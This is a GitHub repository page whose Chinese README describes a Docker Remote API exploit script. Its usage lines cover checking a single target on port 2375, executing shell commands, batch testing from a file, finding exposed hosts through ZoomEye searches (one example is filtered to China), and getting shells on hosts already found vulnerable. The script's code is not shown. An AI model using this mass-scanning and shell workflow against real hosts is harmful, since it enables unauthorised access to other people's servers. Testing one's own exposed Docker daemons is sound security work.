Skip to content

SPuerBRead/Docker-Remote-API-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
.gitattributes
.gitattributes
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
dockerAPI_Exploit.py
dockerAPI_Exploit.py
 
 

Repository files navigation

Docker Remote API Exploit

Docker Remote API Exploit

可以使用ZoomEye的API扫描,也可以自定义扫描的文件,进行批量检测

使用方法:

检测一个url:dockerAPI_Exploit.py -u http://111.222.333.444:2375/ -c

执行shell命令:dockerAPI_Exploit.py -u http://111.222.333.444:2375/ -g

从文件批量测试:dockerAPI_Exploit.py -d dict.txt

使用ZoomEye查找并检测:dockerAPI_Exploit.py -f 需要在Panel_Scan函数填写ZoomEye账号密码

使用ZoomEye自定义查找语句并检测:dockerAPI_Exploit.py -f -k 'port:2375 X-Content-Type-Options: nosniff country:"CN"'

从已经确定存在漏洞的文件中获得url获得shell:dockerAPI_Exploit.py -s dict.txt

About

Docker-Remote-API-Exploit

Resources

Readme
Activity

Stars

30 stars

Watchers

2 watching

Forks

22 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages